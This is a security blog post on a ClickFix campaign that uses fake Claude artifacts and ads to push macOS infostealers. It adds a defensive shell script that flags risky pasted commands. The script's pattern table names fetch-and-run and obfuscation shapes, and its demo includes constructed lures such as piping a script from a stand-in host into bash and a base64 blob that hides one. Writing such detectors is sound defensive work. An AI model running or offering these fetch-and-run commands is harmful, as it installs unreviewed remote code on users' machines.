Don’t Paste Terminal Commands From Strangers: How Fake Claude Artifacts Are Fueling a New macOS Malware Wave
If you’ve ever Googled a quick fix for a Mac issue, you know the drill: search, skim, click the first result, and hope the instructions don’t break anything. Attackers know this too, and they are exploiting it with a new twist. A recent campaign abuses Claude artifacts (shareable, AI‑generated pages) and Google Ads to trick macOS users into running Terminal commands that quietly install infostealers.
This attack pattern, often called ClickFix (a fake error message plus a “fix” the victim is told to paste), is simple, scalable, and surprisingly effective. And yes, people are still pasting commands from random websites into Terminal.
How the Attack Works
The setup is almost elegant in its simplicity. Threat actors publish fake “artifacts” on platforms like Claude: public, AI‑generated guides that look polished and trustworthy. Then they buy Google Ads to push those pages to the top of search results for terms like Homebrew, macOS utilities, and other common troubleshooting queries.
A user clicks the ad, lands on a page that looks helpful, and sees a message claiming something is broken. The page then offers a “quick fix” in the form of a Terminal command. That command doesn’t fix anything. It fetches and runs a macOS infostealer such as MacStealer or Atomic Stealer, built to swipe browser data, Keychain items, and crypto wallets.
It’s social engineering disguised as tech support.
Why This Works So Well
Attackers aren’t relying on pop‑ups or scareware anymore. They’re leaning into trust signals:
A clean, AI‑generated guide
A domain that looks legitimate
A Google Ad at the top of the page
A command that looks technical enough to feel “official”
For many users, that’s all it takes. If a page looks like documentation, it gets treated like documentation.
And because Claude artifacts are public and easy to generate, attackers can spin up dozens of variations in minutes. It’s phishing, but with better typography.
The Real Risk for macOS Users
macOS has a reputation for being harder to compromise, but that doesn’t matter when the user willingly runs the malicious code. Gatekeeper and notarization gate apps you download and open; they have nothing to say about text you paste into a shell. Terminal doesn’t ask whether you trust the stranger who gave you the command; it just executes it.
Once installed, these infostealers can:
Capture passwords and autofill data
Extract browser cookies
Access crypto wallets
Send system info back to the attacker
All from a single copy‑and‑paste.
How to Protect Yourself
The rule is simple: don’t paste Terminal commands from websites you don’t explicitly trust. If a page claims something is broken and hands you a command to fix it, that’s your cue to close the tab. Treat a few shapes as automatic red flags: anything that pipes curl or wget into bash or sh, anything that decodes a base64 blob before running it, and anything that runs osascript or strips the com.apple.quarantine attribute. A fix for a real problem does not need to hide what it does.
Stick to official documentation, verified GitHub repos, and trusted developer sources, and reach them by typing the URL rather than clicking an ad. If you’re troubleshooting something unfamiliar, ask someone who knows what they’re doing before running commands you don’t understand.
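As an added example (not from the original post, and not a tool from any named project), here is a small POSIX shell pre‑flight check you can keep in your dotfiles and run on a pasted command before executing it. It covers both the attack flow above (the fetch‑and‑run command hidden behind a “quick fix”) and the red flags listed in this section: it never runs the command, it reports the risky shapes it finds, and when the command decodes base64 it decodes the blob itself so you can see what is hidden inside, then scans that text too. The sample commands, the example.invalid host and the base64 blob are constructed for illustration; the one real command is the publicly documented Homebrew installer, included to show that the checker reports shape, not intent. A legitimate installer trips it as well, which is exactly the moment to open the script in a browser and read it before running anything.

```sh
#!/bin/sh
# Added example (not from the original post): a pre-flight check for a command
# that a web page told you to paste into Terminal. It never runs the command;
# it only reports the shapes ClickFix-style droppers rely on.
# Every sample command below is constructed for illustration, except the
# publicly documented Homebrew installer, included to show a legitimate hit.

# Pattern table: one ERE per line, then " ## ", then the reason to report.
RISKY_PATTERNS='
(curl|wget)[^|]*\|[[:space:]]*(sudo[[:space:]]+)?(bash|zsh|sh)([[:space:]]|$) ## fetches a remote script and pipes it straight into a shell
(bash|zsh|sh)[[:space:]]+-c[[:space:]]+.?\$\((curl|wget) ## fetches a remote script and executes it via sh -c "$(...)"
base64[[:space:]]+(-[dD]|--decode) ## decodes a base64 blob, hiding the real command from the reader
osascript ## runs AppleScript, commonly used by macOS stealers to show a fake password prompt
xattr[[:space:]].*quarantine ## strips the Gatekeeper quarantine attribute from a download
(^|[[:space:]&|;])(nohup|eval)[[:space:]] ## detaches the process or eval-executes generated text
'

# scan_patterns TEXT: print one "[!]" line per pattern in the table that matches TEXT.
scan_patterns() {
    printf '%s\n' "$RISKY_PATTERNS" | while IFS= read -r line; do
        [ -n "$line" ] || continue
        re=${line%% ## *}
        why=${line#* ## }
        if printf '%s' "$1" | grep -Eq -- "$re"; then
            printf '  [!] %s\n' "$why"
        fi
    done
}

# audit_cmd COMMAND: print findings; return 1 if any marker was found, else 0.
audit_cmd() {
    printf 'Command: %s\n' "$1"
    findings=$(scan_patterns "$1")
    # If the command decodes base64, decode the blob ourselves so the reader can
    # see the hidden command, and scan that text with the same table.
    if printf '%s' "$1" | grep -Eq 'base64[[:space:]]+(-[dD]|--decode)'; then
        blob=$(printf '%s' "$1" | grep -oE '[A-Za-z0-9+/]{16,}={0,2}' | head -n 1)
        # GNU base64 takes -d; older macOS base64 takes -D, so try both.
        decoded=$(printf '%s' "$blob" | base64 -d 2>/dev/null \
                  || printf '%s' "$blob" | base64 -D 2>/dev/null)
        if [ -n "$decoded" ]; then
            printf '  [i] decoded payload: %s\n' "$decoded"
            inner=$(scan_patterns "$decoded")
            if [ -n "$inner" ]; then
                findings="$findings
$inner"
            fi
        fi
    fi
    if [ -n "$findings" ]; then
        printf '%s\n' "$findings"
        printf 'Verdict: DO NOT RUN. Open the source in a browser and read it first.\n'
        return 1
    fi
    printf 'Verdict: no ClickFix markers found (still read it before running).\n'
    return 0
}

# Demo: three constructed samples (the base64 blob decodes to "curl -s x | sh")
# plus the real Homebrew installer, which is flagged on shape alone.
set -- \
    'curl -fsSL https://example.invalid/fix.sh | bash' \
    "echo 'Y3VybCAtcyB4IHwgc2g=' | base64 -d | bash" \
    '/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"' \
    'brew install wget'
for c in "$@"; do
    audit_cmd "$c" || true   # a non-zero status here is the expected verdict
    echo
done
```

Usage: `audit_cmd 'the command you were told to paste'`; an exit status of 1 means at least one marker was found and the findings are printed. The patterns are deliberately narrow and will miss obfuscation they were not written for, so extend the table when you see a new lure rather than loosening the existing regexes.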
Final Thoughts
This campaign isn’t clever because of the malware—it’s clever because of the psychology. Attackers don’t need zero‑days when they can convince users to run the payload themselves.
Stay skeptical. Stay curious. And keep your Terminal commands on a strict “friends‑only” basis.
#MacOSMayhem #ClickFixChaos #StopPastingCommands